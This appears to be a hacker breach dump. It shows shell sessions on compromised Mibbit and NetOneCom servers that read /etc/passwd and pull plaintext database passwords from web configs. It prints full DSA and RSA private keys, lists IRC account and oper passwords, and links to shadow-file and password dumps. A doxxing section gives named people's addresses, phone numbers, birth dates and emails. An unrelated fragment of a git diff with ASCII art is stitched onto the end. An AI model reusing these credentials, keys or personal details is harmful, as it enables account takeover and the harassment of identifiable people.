sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:105:MySQL Server,,,:/var/lib/mysql:/bin/false
mibbit:x:1000:1000::/home/mibbit:/bin/bash
wwwadmin:x:1001:1001::/home/wwwadmin:/bin/bash
zfreebies:x:1002:1002::/home/zfreebies:/bin/bash
smmta:x:105:107:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:106:108:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
jimmy:x:1003:1003::/home/jimmy:/bin/bash
bind:x:107:109::/var/cache/bind:/bin/false
wwwadmin@status:~$ ls -alt /
total 92
drwxrwxrwt 4 root root 4096 Aug 13 07:25 tmp
drwxr-xr-x 78 root root 4096 Aug 13 01:14 etc
drwxr-xr-x 21 root root 4096 Jul 7 07:40 .
drwxr-xr-x 21 root root 4096 Jul 7 07:40 ..
drwxr-xr-x 11 root root 12760 Jul 7 07:40 dev
drwxr-xr-x 11 root root 0 Jul 7 07:40 sys
dr-xr-xr-x 99 root root 0 Jul 7 07:40 proc
drwxr-xr-x 2 root root 4096 May 29 23:11 bin
drwxr-xr-x 15 root root 12288 May 29 23:11 lib
drwx------ 3 root root 4096 May 29 23:11 root
drwxr-xr-x 2 root root 4096 Nov 6 2010 sbin
drwxr-xr-x 6 root root 4096 Mar 4 2010 home
drwxr-xr-x 11 root root 4096 Sep 30 2009 usr
drwxr-xr-x 14 root root 4096 Aug 11 2009 var
drwxr-xr-x 2 root root 4096 Apr 23 2009 media
drwxr-xr-x 2 root root 4096 Apr 23 2009 opt
drwxr-xr-x 2 root root 4096 Apr 23 2009 srv
drwx------ 2 root root 16384 Apr 23 2009 lost+found
drwxr-xr-x 2 root root 4096 Apr 13 2009 boot
drwxr-xr-x 2 root root 4096 Apr 13 2009 mnt
drwxr-xr-x 2 root root 4096 Mar 6 2009 selinux
wwwadmin@status:~$ ls -alt /home
total 24
drwxr-xr-x 6 wwwadmin wwwadmin 4096 Aug 12 21:44 wwwadmin
drwxr-xr-x 21 root root 4096 Jul 7 07:40 ..
drwxr-xr-x 7 mibbit mibbit 4096 Jun 29 13:30 mibbit
drwxr-xr-x 4 zfreebies zfreebies 4096 Apr 29 2010 zfreebies
drwxr-xr-x 3 jimmy jimmy 4096 Mar 8 2010 jimmy
drwxr-xr-x 6 root root 4096 Mar 4 2010 .
wwwadmin@status:~$ ls -alt
total 52
drwxr-xr-x 6 wwwadmin wwwadmin 4096 Aug 12 21:44 .
-rw------- 1 wwwadmin wwwadmin 1979 Aug 12 21:44 .mysql_history
-rw------- 1 wwwadmin wwwadmin 120 Aug 12 05:15 .nano_history
drwxrwxrwx 2 wwwadmin wwwadmin 4096 Aug 7 18:29 .ssh
-rw------- 1 wwwadmin wwwadmin 6566 Aug 7 15:02 .bash_history
drwxr-xr-x 3 wwwadmin wwwadmin 4096 Jan 26 2011 wiki_new
drwxr-xr-x 4 wwwadmin wwwadmin 4096 Jan 25 2011 wiki_backup_25Jan
lrwxrwxrwx 1 root root 31 Jan 17 2011 blog -> /var/www/blog.mibbit.com/htdocs
drwxr-xr-x 2 wwwadmin wwwadmin 4096 Dec 10 2010 WP_BACKUP
drwxr-xr-x 6 root root 4096 Mar 4 2010 ..
lrwxrwxrwx 1 wwwadmin wwwadmin 32 Sep 13 2009 wiki -> /var/www/wiki.mibbit.com/htdocs/
-rw-r--r-- 1 wwwadmin wwwadmin 220 Mar 2 2009 .bash_logout
-rw-r--r-- 1 wwwadmin wwwadmin 3115 Mar 2 2009 .bashrc
-rw-r--r-- 1 wwwadmin wwwadmin 675 Mar 2 2009 .profile
wwwadmin@status:~$ ls -alt /var/www/
total 56
drwxr-xr-x 4 root root 4096 May 12 2010 www.stopitmovies.com
drwxr-xr-x 13 root root 4096 May 12 2010 .
drwxr-xr-x 4 root root 4096 Mar 24 2010 status.mibbit.com
drwxr-xr-x 4 root root 4096 Mar 16 2010 a.mibbit.com
drwxr-xr-x 6 root root 4096 Feb 19 2010 blog.mibbit.com
drwxr-xr-x 4 root root 4096 Dec 23 2009 adminwiki.mibbit.com
drwxr-xr-x 4 root root 4096 Oct 12 2009 www.rollered.com
drwxr-xr-x 4 root root 4096 Oct 12 2009 www.wizzig.com
drwxr-xr-x 4 www-data www-data 4096 Oct 12 2009 www.axod.net
drwxr-xr-x 5 root root 4096 Sep 30 2009 www.zfreebies.com
drwxr-xr-x 5 root root 4096 Sep 15 2009 forum.zfreebies.co.uk
drwxrwxr-x 5 www-data www-data 4096 Sep 13 2009 wiki.mibbit.com
-rw-r--r-- 1 root root 45 Aug 11 2009 index.html
drwxr-xr-x 14 root root 4096 Aug 11 2009 ..
wwwadmin@status:~$ cat /var/www/a.mibbit.com/htdocs/admin/index.php | head -n 3
<?
$sql = @mysql_connect("127.0.0.1", "advertuser", "e5e32f36aa88");
@mysql_select_db("adverts", $sql);
wwwadmin@status:~$ cat /var/www/a.mibbit.com/htdocs/sessionError.php | head -n 3
<?
$sql = @mysql_connect("127.0.0.1", "root", "5068c8055ffc");
wwwadmin@status:~$ ls -alt /var/www/blog.mibbit.com/htdocs
total 308
drwxr-xr-x 5 wwwadmin wwwadmin 4096 Nov 15 2010 .
-rw-r--r-- 1 wwwadmin www-data 655 Nov 15 2010 favicon.ico
drwxr-xr-x 5 wwwadmin www-data 4096 Feb 23 2010 wp-content
-rw-r--r-- 1 wwwadmin www-data 1548 Feb 19 2010 wp-config.php
-rw-r--r-- 1 wwwadmin www-data 93445 Feb 19 2010 xmlrpc.php
-rw-r--r-- 1 wwwadmin www-data 23097 Feb 19 2010 wp-settings.php
-rw-r--r-- 1 wwwadmin www-data 3693 Feb 19 2010 wp-trackback.php
-rw-r--r-- 1 wwwadmin www-data 218 Feb 19 2010 wp-rss.php
-rw-r--r-- 1 wwwadmin www-data 220 Feb 19 2010 wp-rss2.php
-rw-r--r-- 1 wwwadmin www-data 7578 Feb 19 2010 wp-mail.php
-rw-r--r-- 1 wwwadmin www-data 487 Feb 19 2010 wp-pass.php
-rw-r--r-- 1 wwwadmin www-data 218 Feb 19 2010 wp-rdf.php
-rw-r--r-- 1 wwwadmin www-data 316 Feb 19 2010 wp-register.php
-rw-r--r-- 1 wwwadmin www-data 2341 Feb 19 2010 wp-load.php
-rw-r--r-- 1 wwwadmin www-data 22721 Feb 19 2010 wp-login.php
drwxr-xr-x 6 wwwadmin www-data 4096 Feb 19 2010 wp-includes
-rw-r--r-- 1 wwwadmin www-data 1946 Feb 19 2010 wp-links-opml.php
-rw-r--r-- 1 wwwadmin www-data 220 Feb 19 2010 wp-feed.php
-rw-r--r-- 1 wwwadmin www-data 1253 Feb 19 2010 wp-cron.php
-rw-r--r-- 1 wwwadmin www-data 238 Feb 19 2010 wp-commentsrss2.php
-rw-r--r-- 1 wwwadmin www-data 2616 Feb 19 2010 wp-config-sample.php
-rw-r--r-- 1 wwwadmin www-data 40400 Feb 19 2010 wp-app.php
-rw-r--r-- 1 wwwadmin www-data 220 Feb 19 2010 wp-atom.php
-rw-r--r-- 1 wwwadmin www-data 274 Feb 19 2010 wp-blog-header.php
-rw-r--r-- 1 wwwadmin www-data 3928 Feb 19 2010 wp-comments-post.php
drwxr-xr-x 8 wwwadmin www-data 4096 Feb 19 2010 wp-admin
-rw-r--r-- 1 wwwadmin www-data 15410 Feb 19 2010 license.txt
-rw-r--r-- 1 wwwadmin www-data 7644 Feb 19 2010 readme.html
-rw-r--r-- 1 wwwadmin www-data 397 Feb 19 2010 index.php
drwxr-xr-x 6 root root 4096 Feb 19 2010 ..
wwwadmin@status:~$ cat /var/www/blog.mibbit.com/htdocs/wp-config.php | head -n 8
<?php
// ** MySQL settings ** //
define('DB_NAME', 'wpblog'); // The name of the database
define('DB_USER', 'wpuser'); // Your MySQL username
define('DB_PASSWORD', '13c3cada3921'); // ...and password
define('DB_HOST', 'localhost'); // 99% chance you won't need to change this value
define('DB_CHARSET', 'utf8');
define('DB_COLLATE', '');
wwwadmin@status:~$ ls -alt /var/www/wiki.mibbit.com/htdocs/
total 720
-rw-rw-r-- 1 www-data www-data 6960 Mar 21 12:46 LocalSettings.php
drwxrwxr-x 9 www-data www-data 4096 Mar 21 12:41 extensions
drwxr-xr-x 2 wwwadmin wwwadmin 4096 Jan 26 2011 SpamBlacklist
drwxrwxr-x 17 www-data www-data 4096 Jan 26 2011 .
drwxrwxr-x 22 www-data www-data 4096 Jan 26 2011 images
drwxrwxr-x 2 www-data www-data 4096 Jan 26 2011 bin
drwxrwxr-x 2 www-data www-data 4096 Jan 26 2011 config
drwxrwxr-x 4 www-data www-data 4096 Jan 26 2011 docs
drwxrwxr-x 17 www-data www-data 4096 Jan 26 2011 includes
drwxrwxr-x 4 www-data www-data 4096 Jan 26 2011 languages
drwxrwxr-x 13 www-data www-data 12288 Jan 26 2011 maintenance
drwxrwxr-x 2 www-data www-data 4096 Jan 26 2011 math
drwxrwxr-x 2 www-data www-data 4096 Jan 26 2011 serialized
drwxrwxr-x 10 www-data www-data 4096 Jan 26 2011 skins
drwxr-xr-x 2 wwwadmin wwwadmin 4096 Jan 4 2011 cache
-rw-r--r-- 1 wwwadmin wwwadmin 59433 Jan 4 2011 RELEASE-NOTES
-rw-r--r-- 1 wwwadmin wwwadmin 2090 Jan 4 2011 CREDITS
-rw-r--r-- 1 wwwadmin wwwadmin 8821 Jan 4 2011 profileinfo.php
-rw-rw-r-- 1 root root 655 Nov 15 2010 favicon.ico
-rw-r--r-- 1 wwwadmin wwwadmin 13307 Mar 25 2010 UPGRADE
-rw-r--r-- 1 wwwadmin wwwadmin 392287 Mar 12 2010 HISTORY
-rw-r--r-- 1 wwwadmin wwwadmin 4905 Mar 8 2010 thumb.php
-rw-r--r-- 1 wwwadmin wwwadmin 4707 Feb 15 2010 api.php
-rw-r--r-- 1 wwwadmin wwwadmin 174 Feb 3 2010 php5.php5
-rw-r--r-- 1 wwwadmin wwwadmin 89 Feb 3 2010 redirect.phtml
-rw-r--r-- 1 wwwadmin wwwadmin 86 Feb 3 2010 wiki.phtml
-rw-r--r-- 1 wwwadmin wwwadmin 4329 Jan 1 2010 index.php
-rw-r--r-- 1 wwwadmin wwwadmin 4031 Oct 14 2009 img_auth.php
-rw-rw-r-- 1 www-data www-data 9416 Sep 13 2009 mibbit.png
-rw-rw-r-- 1 www-data www-data 1049 Sep 13 2009 AdminSettings.php
drwxrwxr-x 5 www-data www-data 4096 Sep 13 2009 ..
-rw-r--r-- 1 wwwadmin wwwadmin 76 Jul 27 2009 FAQ
drwxrwxr-x 4 www-data www-data 4096 Jul 13 2009 t
drwxrwxr-x 2 www-data www-data 4096 Jul 13 2009 tests
-rw-r--r-- 1 wwwadmin wwwadmin 648 May 7 2009 StartProfiler.sample
-rw-rw-r-- 1 www-data www-data 3952 Mar 21 2009 install-utils.inc
-rw-r--r-- 1 wwwadmin wwwadmin 3054 Mar 21 2009 opensearch_desc.php
-rw-r--r-- 1 wwwadmin wwwadmin 383 Mar 21 2009 redirect.php
-rw-r--r-- 1 wwwadmin wwwadmin 32 Mar 16 2009 trackback.php5
-rw-rw-r-- 1 www-data www-data 603 Jan 7 2009 StartProfiler.php
-rw-r--r-- 1 wwwadmin wwwadmin 3649 Nov 11 2008 README
-rw-r--r-- 1 wwwadmin wwwadmin 1347 Nov 5 2008 trackback.php
-rw-r--r-- 1 wwwadmin wwwadmin 4138 Apr 18 2008 INSTALL
-rw-rw-r-- 1 www-data www-data 618 Apr 11 2008 Makefile
-rw-r--r-- 1 wwwadmin wwwadmin 39 Mar 3 2008 opensearch_desc.php5
-rw-r--r-- 1 wwwadmin wwwadmin 25 Feb 4 2008 api.php5
-rw-r--r-- 1 wwwadmin wwwadmin 31 Feb 4 2008 img_auth.php5
-rw-r--r-- 1 wwwadmin wwwadmin 28 Feb 4 2008 index.php5
-rw-r--r-- 1 wwwadmin wwwadmin 31 Feb 4 2008 redirect.php5
-rw-r--r-- 1 wwwadmin wwwadmin 29 Feb 4 2008 thumb.php5
-rw-r--r-- 1 wwwadmin wwwadmin 17997 Apr 5 2006 COPYING
wwwadmin@status:~$ cat /var/www/wiki.mibbit.com/htdocs/LocalSettings.php | grep "password" -C 5
$wgDBtype = "mysql";
$wgDBserver = "localhost";
$wgDBname = "wikidb";
$wgDBuser = "wikiuser";
$wgDBpassword = "a69e74574db6";
$wgDBport = "5432";
$wgDBprefix = "";
$wgDBadminuser = "wikiuser";
$wgDBadminpassword = "a69e74574db6";
# Schemas for Postgres
$wgDBmwschema = "mediawiki";
$wgDBts2schema = "public";
wwwadmin@status:~$ cat /var/www/adminwiki.mibbit.com/htdocs/LocalSettings.php | grep "password" -C 5
## Database settings
$wgDBtype = "mysql";
$wgDBserver = "localhost";
$wgDBname = "wikiadmindb";
$wgDBuser = "wikiadminuser";
$wgDBpassword = "fe102b0d7793";
# MySQL specific settings
$wgDBprefix = "";
# MySQL table options to use during installation or update
wwwadmin@status:~$ exit
Connection to status.mibbit.com closed.
:: 0x05 - sidewinder.netonecom.net ::
backup@sidewinder ~> ls -al # read world backups of all servers with /etc/shadow ROFL
total 596
drwxr-xr-x 16 backup root 432 2011-08-12 18:52 .
drwxr-xr-x 26 root root 632 2011-05-12 14:12 ..
drwxr-xr-x 2 backup users 1344 2009-08-27 10:44 amram
drwxr-xr-x 2 root root 587920 2011-08-13 12:37 awstats
-rw------- 1 backup 1452 17 2006-09-18 14:47 .bash_history
drwxr-xr-x 2 backup users 224 2009-10-07 12:58 hornet
drwxr-xr-x 2 backup users 1336 2010-08-24 11:23 ice
drwxr-xr-x 2 backup users 1216 2010-11-12 16:07 janco
drwxr-xr-x 3 backup users 264 2011-08-13 01:27 magic
drwxr-xr-x 3 backup users 1416 2011-07-26 12:32 merlin
drwxr-xr-x 2 backup users 1432 2011-05-16 05:55 multimag
drwxr-xr-x 2 backup users 1640 2010-10-11 15:49 phantom
drwxr-xr-x 2 backup users 1680 2011-01-13 15:57 sidewinder
drwx------ 2 backup users 320 2011-08-12 18:52 .ssh
drwxr-xr-x 2 backup users 1176 2009-10-14 10:52 sydex
-rw------- 1 backup 1452 4999 2011-08-12 18:52 .viminfo
backup@sidewinder ~/.ssh> cat id_dsa id_rsa # not identity, its not ASCII
-----BEGIN DSA PRIVATE KEY-----
MIIDPwIBAAKCAQEA1KnQoLv0drmXUon9nIZUlXhQ7f6iMU0o5xlpbUg0Kwx5cXVB
mhn4gsr4CDk49+fYr29tuHn0NycY2lwuaMUV2yP15Pd05Wx/jgYgKTdaqZaZaIPX
OXbGAdFz3cd13g5pTAwDLblNp6gI4PlcXO/adN1ywOyLzVCmPHcBZqevPLMcL52v
b2ECeBuXKU5Z9leFoOF9IdkhZXTnsvj/yFLy8ZMpBD5JUyCXTfXw7cZZUko1X5wg
1lN76c+A0JKm0cMq8+NvA8ufRaGL2FXUv3McljrcTaRXMksWG3Z/KxEHsh3UY+pH
iNFESYED0jl4o84P6GLIxr7hlqQxpV0TyhwCiQIVALmyxXXqqqrEa83KyCyz557b
qdaLAoIBAQC3+GjuKabODKLSiRAgngwq88L1OJ45HtXyLIBudHLky0JM/nbUVx4f
coQip4jeLx17cMHK7Q/8gY13O81eQe8+IZ2De94PFL2troDsEW28R+7LOKcvidWp
+y2edoU77+/p2aLBUwmiYxlcmX1+w0iH/U/eMZUjtQJ6rawWFnaykBUazZjFNQdn
ZNusvxa4SKOf9Nx5qyXwSW52gqd1dNnrJFu0C10p3Y6ErllVwp5iUTAPPlOeGFnD
hoeu9FiLMVmJHzmiNDLCr6koBkEv+xQl6aL3DQRC7PymyYitltXTf1bf49kDrMWC
7BWuV3PD2pStnu1APfBALYI4DYplfO8MAoIBAQCRKSygD8aMdX83qgMCM6tphVun
snCtDZXhqLpx70aQvgZWoKYQLzdjdcicdSn9JtiWiUOzeS9A4ee5pizMwQOcbn1R
mnwIJe+36EwvCB1nhcwClGJz1ZFVR3JjMJAWob4LkYKnWPjvbLotjr1nMwCKyYRp
swTW1YZFfmodQkoPwdZ4dNKAyxxbLtWCL//l0WlTuzAfVTV4xxI/+BcfaxwW8O9W
XGj/dQwT8TjSqSUlJ2o5S6NX1tD0CmpfJ6JhcEIhAgcO2D2H15h+SZQCGkTB5Lx6
yI4A1msNuosa2+e8txxkoFZ/zIN2EdSqI5nkybOEpq971I8y1ieYtN0bH1MlAhRm
ovpJJvoWRqPg6WS+lyV49RWzMw==
-----END DSA PRIVATE KEY-----
-----BEGIN RSA PRIVATE KEY-----
MIIEoAIBAAKCAQEA43hMo7RV/7O4jNNzcGLrA2NA7kzA3RkcYnNw/lX2iJd0qR2n
a+GEySa/RtAbRRrxTDRgQ4H4LvrNGttoRIUS6gsMNpC4jxHUhzdYQikedNUNEA81
Ro7qMOULpRy9eoE0kntWIxyi5lpoSKR67KEkfhoChSe3ZEa0HqGumGWvhKJIdNtZ
Rd3GJc9HvzIr5rKxgmw4oQP9AHhhuwHTmVVLpkCI+eL8uemH+Bp8BHGNXZ4RtN50
oFB+09vtTfgCELYtAjZf6LQMCqdu6wLDx6VPxz1L6ukSoU6Oljka7Ktxjd9YR/ZU
dbmORCArArxW606rbLa9vspcWXpWBbNEwyiCXQIBIwKCAQBUfSPHxqOZfUSMFAZO
UKBu+PrcKyMQSyfMy8riH+3a9m0o3yDtjkdDZinJ2ESko5t0E3Q2VNiGemlwYB9p
6EjalmOfPRFZtipeG970AKTpkPY5KjhcCTJp7qyNyNip2DgZJn8UWxfvKOTnyBBm
hP7tAli1HWFfwn1qdpFOjCs/484Gryp0q+WFdrNrPJ1/8zqAUyqJj0cTXv6Pyeyl
RGkFmggFQgjhT/+rlrbqreMaiUMxUT2GjlvDNATrIydQVFyxIuF2El5lTVRWzV0m
rxTLTzxmZkgum+ANEC5pBNqGiTkPa2sCvRC3gtKmaZmFh6bv2/bbFOYCOEyHMfML
tQLPAoGBAPVaMLkmuQW+CUfGb+qCz/pHxDVG0Vj97GFgs1eIoskn5/3CSX9tkkTV
mKHQ3cFiV0QJWyy0MQOCTzC/yHPRj0DrZqsnOVufc1HVIADck1NKBVcXUyhRlbcB
1qW3IXeagr+lmZeVB+8WtM3oD9d8HY+Gvx+4O8ES9Am85kGfuQ8TAoGBAO1XcJBH
fVZ2mhzrvJlaLHwv730i6/hYPXphB3UYq48gfsRkhT4BbDBUiZ7201TbN7ZOHrX4
AqumdtayqYbdCLd0+6SDmAELsrAsMAM0JuvjsWXnR3a+i1T7D4Iay62c13UqFCae
PnIrqK/Qy0SRiNCbRPG4uM2PUS96Wjm1JabPAoGAfi5iM1W+PXetAFdswb+eKPG1
XTpdCTIhy64TFxMR48thXe7j+GQ8mG3Zd8qArJj5rfYu48piWZN5LwOLqUczuvy4
dUdfU7EWvF76hBmq2mCVCDfhn7Tt6Rbjayr7RNMeq7RAXJXJkOcbKBDyNE51mkVM
WXSxBDWiE6L6Ex7xdXcCgYA9B9sdyT18oiehCWsC3Kxacrns+lnvZyXAYhfcSCwd
fWJtA+e/fLVrg3PYa1rp7zo2MVharX0HkTSAWdPSONZbD3PoeZwdhqpKjwUII1p3
K+vJvyEBRvCg0tgaJCW+7dEA3u89IWCDwhVvCc3ebpDlLz2dPiDkZq557EMWJ0Qy
NQKBgFpovHwPC5k1bX9y2Sv7J+YgIiDgELsOxF9UQzWFzb1XCPczUA027RZTgLJX
ILQi0R8af8yCpxN3PUSQXtWwZXZMJZF9puFM2vXRe1Xd3kuZg4BEkoVtB5hYK5oE
yqzQAbROM2rLILM6Bj+zro5IApDQxJ4FokvNfhJm2JzdiSmo
-----END RSA PRIVATE KEY-----
jared@sidewinder.netonecom.net weJAruSE
http://www.2shared.com/file/-gqbHglO/jared.html (NicE priv8 keyz ;))
trix@sidewinder.netonecom.net trix4kids
molkmin -> jared: ah, you plan on lettingothers ssh in?
jared -> molkmin: no i thought you did
molkmin -> jared: hell no.
jared -> molkmin: okay well then forget what i said
molkmin -> jared: there are like 5 people that can ssh into sidewinder
molkmin -> jared: or maybe 7
jared -> molkmin: and only 2 of them are convicted felons
molkmin -> jared: I just recently secured SSH
jared -> molkmin: ahh so it won't allow IPs other than ours <<< You use open proxies too?
molkmin -> jared: got hacked..user used an account name of "test" password "test" <<< LOL
jared -> molkmin: grr
:: 0x06 - d0x ::
Axod
Name: Jimmy Moore
Location: Probably out of the UK
NickServ: axod:383cf3a3f7c2
Oper: axod:ce18da2ddae4
Email: jimmy.moore@gmail.com
Email2: jimmy@axod.net
Email3: axod@axod.net
Email4: axodmedia@gmail.com
Mugshot: http://a1.twimg.com/profile_images/71426235/Photo_175.jpg
http://bizzy.co.uk/uk/05956691/axod-media
http://twitter.com/#!/mibbit
http://twitter.com/#!/axod
http://digg.com/axod
http://axod.blogspot.com/
Azander
Name: Alanon Zander
Address: 2132 South 29 Rd Cadillac, MI 49601
NickServ: Azander:kikicat
Oper: azander:flagon3
Email: alanonzander@gmail.com <<< kikicat
Email2: alanonzander@yahoo.com <<< password recovery sends back to gmail LOL
https://plus.google.com/113170461621014873855/posts
http://www.myspace.com/alanonzander
http://user.netonecom.net/~azander/alanon.htm
Havvy
Name: Ryan Havvy
Age: 18?
Address: Somewhere in Washougal, WA
NickServ: Havvy:hmagic
Oper: havvy:hknight
Email: ryan.havvy@gmail.com
http://twitter.com/#!/havvy
http://havvy.wordpress.com/
http://www.stumbleupon.com/stumbler/Havvy/
havvy havvy
xkcd.com/936/ Password security explained in a couple panels.
10 Aug ^^^ coming from someone whose passwords are 6 lowercase characters?? hahahah
Hercule
Name: Jürgen Wind
Location: Germany
NickServ: Hercule:herc47
Oper: hercule:0b2ac71dc51f
Email: jwind@gmx.de
Joshua
Name: Joshua Luckers
Age: 23
DOB: 06/15/1988
NickServ: Joshua:TwEaKeRs
Oper: joshua:ec31e1a98607
Email: joshua@sensiva.net
Mugshot:http://mediacdn.disqus.com/uploads/users/146/1862/avatar92.jpg
http://joshualuckers.nl/
Kitsune
Name: Todd Parker
Email: kitsune@sbcglobal.net
NickServ: Kitsune:undquiet
Oper: kitsune:$5T`mIb5705
http://nenolod.net/~nenolod/mibbit-debacle.html
Molkmin
Name: Thomas W Lyon
Age: 58
DOB: 06/04/1953
Address: 2188 US Highway 10 Sears, MI 49679-8073
NickServ: molkmin:sotw1btn
Oper: molkmin:ghotisotwbtn
Email: tlyon@netonecom.net
Email2: fxrocker@gmail.com
Phone: 231-734-6144
http://www.netonecom.net
http://photobucket.com/home/molkmin <<< molkmin:sotw1btn
http://twitter.com/#!/molkmin <<< molkmin:sotw1btn
Pottsi
Name: Ian Potts
Age: 24
Location: Manchester, UK
NickServ: pottsi:digger
Email: pottsi@pottsi.com
Email2: ian1potts@aol.com
Email3: iantom90@hotmail.co.uk
http://pottsi.com/
http://www.myspace.com/56242380
Sindacious
Name: James Clifton Newton
Age: 19
DOB: 05/06/1992
Address: 1506 Jenks Ave Panama City, FL 32405
Oper: sindacious:284adflgy343
Phone: 785-746-0322, 850-215-2518
Email: admin@SinIRC.net
http://sindacio.us/
http://www.sindacious.com (It just redirects to sindacio.us)
http://twitter.com/sindacious
:: 0x07 - exit ::
>>> K1LL Th3 G1b50n!
attachm3nts >>>
n3t0nec0m shad0ws
m1rr0r 1: http://www.mediafire.com/file/mdlc4wibpacevv6/swshadow
m1rr0r 2: http://www.2shared.com/file/Axzg1umn/swshadow.html
w1k1 pass3s
m1rr0r 1: http://www.mediafire.com/?s9c9jtns5tp8oux
m1rr0r 2: http://www.2shared.com/file/pAg2gqyb/mibbitwiki.html
n1cks3rv pass3s
m1rr0r 1: http://www.mediafire.com/?g8hpr34ssu1ssdq
m1rr0r 2: http://www.2shared.com/document/TLTX8j3E/fullnspassdump.html
pMs
m1rr0r 1: http://www.2shared.com/file/Eq3cyC7f/mibbitpms.html
m1rr0r 2: http://tools.mibbit.com/mibbitpms.out :PppPpPPPPppppppp
cHaN msGs
http://www.2shared.com/file/5Kf08Z3-/mibbitchanmsgs.html
root@tools:~# wall <<< "E0F"
Broadcast Message from root@tools
(/dev/pts/3) at [redacted] ...
E0F

113
htp/HTP5/0x00_Intro.txt
View file

@ -1,113 +0,0 @@
█████████████▒████████
▓▒██████▒░█░███░░ ▒███████████▒
███████████ ▓█████████████████████▒
▓████ ▒█████████▒▒░███████████████████████▒
░▒███████░████████▒██ ▒██████████████████████░
▓███████████████▒██ ░█ ░████████████████████████░
████████████████████▒ ███▒█████████████████████████████
░████████▒██████████████████ ▒█████████████████████████▒
███████████▒████████████ ▒ ███████████████████████████▒
▒██████████▒ ░████████████ ▒██▓ ░▒██████████████████████████▒
█████████ ▒███▒ ███████░ ███████████████████████████████████
█████████░██████ █████▒██▓ ▓███████▒▒████████████████████████████
▒██████████████████ ████▒▓▒█▒ █████████████████████████████████████
░████████████████████░▓█░ ░█ ░▓███████████████████████████████████
███████████████████▓ ░ █ ░██████████████████████████████████
████████████████████ █▒ ██░▒███████████████████████████████████
▒███████████████████ ▒ ▒▓███▒▓ ███████████████████████████████████
░██████████████████ █▓▓▓▓█░ █ ████████████░ ░████████████████
██████████████████ ▓███ █░ █████████████▓██████████████████ █
██████████████████ ░░ ▓█ ▒ ███████████████████████████████ ▓
██████████████████░ ▓ █░ █ ███████████████████████████████░
██████████████████ ██ ▒███ ████████████████████████████████▒█
███████████████▒██ █ ░▒▒██ ░▒████████████████████████████ █
███████████████▒▒▒ ███ ████████████████████████████▒ █░
█░ ▓▓██████ ░ ▓█ ████▒ █ ████████████████████████████ █▓
██████▒ ▒█ ▒ █▓ █ ▓████████████████████████████ ▒█▒
▓ ▒▒█▓█▓████ ▒▒██▒ ██ ▒▒▒░█████████████████████████████▓██
███▓ █░ ▒██████░ ░ ░▓███▒ ██████████████████████████████░
██ █▓ ░████▒▒ ██ ▒ ░▒▒▓█▒ █████████████████████████████
░ ▓█▓ ██████▓▒ ███ ██ ██▓█▒▓░ ░██████████████████
▒░ ░███ ████████████▒▒ ▓▓ ▓█░ █ ██████████████████
█▒ ▒██▒ ██████████████ ░ █▒ ▒▒█▒▓ ▒▒▒░██████████████████
██ ██ ▒▓ ███████████████████ ██▒ ▒███▒▓██▓ █ ░████████████
██▓█ █ ███████████████████▒ ███▓ ▓█ █▓ ████████████▓
███ ██████████████████████░▒▒█▒ ▒█ █▒ ██ ██████████▓
█▒█ ████████████████████████ ░░ █▒ ▒ ▓██████████
▒▒█ ███████████████████████ █ █ ▒ ▒▒█████████▓
█▒ ▒███████████████████████▒ █ ██ ██▒ ██ ░███▒ ██
██ █ ▒░ ▓███████████████████ ██ ███▒ ▒ ░██ █▒▒ ▒████░░██ ██
█▓███▒ ██▓▒█████████████░ ██ ▓█░░░░██░ █▒ ▒ ░█░ ▓█░░██░
████▒ █ ▓███████████ ▓███░ █ ▓█ ▒ ▒▓ ███
█████ ███ ████████░ ▒█░ ██ █ ██ ▒▓ ▒ ███ ██
█▓██▓ ██▒ ▒███████▓ █▒ ▓▓ ░███ ██▒▒▒ ▒█░ ███████▒
▒█░▒ ░ ░█░ ███████▒ ░▓ ▒█████▒███▓░ ▒███▒████░ ███████▒
▒█████░░ ░▒ ░███████ ░█▓ ░░███ █ █ █ ██████▓
▒██████ ▒███████████ ░ ▒▒███ ░▓ █ ░ ░█ █████▒
▒███████▒ ███ ▒██████░███▒▒▒█░ ▒ ▓ █░ █ ░████▓
███████ ░█░ ░▒ ▓██████ █ ▒█ █░ ▓██░░█▒▒ ▒████▒
▓███████ ▒█▒ ░██ ▒██ ▒ ███████ ███░████▓██████
/████████ /████████ /██████████████████ /███████████████▄
|▒████████ |████████ |▒██████████████████ |▒█████████████████
|▒████████ |████████ |▒██████████████████ |▒██████▀▀▀▀▀▀█████
|▒█▓▓▓▓▓▓█▄▄▄▄▄█▓▓▓▓▓▓█ |/▒▒▒▒/█▓▓▓▓▓▓█▒▒▒▒/ |▒█▓▓▓▓▓ |▓▓▓██
|▒█▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█ |▒█▓▓▓▓▓▓█ |▒█▓▓▓▓▓ |▓▓▓██
|▒█▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█ |▒█▒▒▒▒▒▒█ |▒█▓▓▓▓▓▓▓▓▓▓▓▓▓▓██
|▒█▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒█ |▒█▒▒▒▒▒▒█ |▒█▒▒▒▒▒▒▒▒▒▒▒▒▒▒██
|▒█▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒█ |▒█░░░░░░█ |▒█▒▒▒▒▒█▀▀▀▀▀▀▀▀▀
|▒█░░░░░░█▀▀▀▀▒█░░░░░░█ |▒█░░░░░░█ |▒█░░░░░█
|▒█░░░░░░█ |▒█░░░░░░█ |▒█ █ |▒█░░░░░█
|▒█ █ |▒█ █ |▒█▄▄▄▄▄▄█ |▒█ █
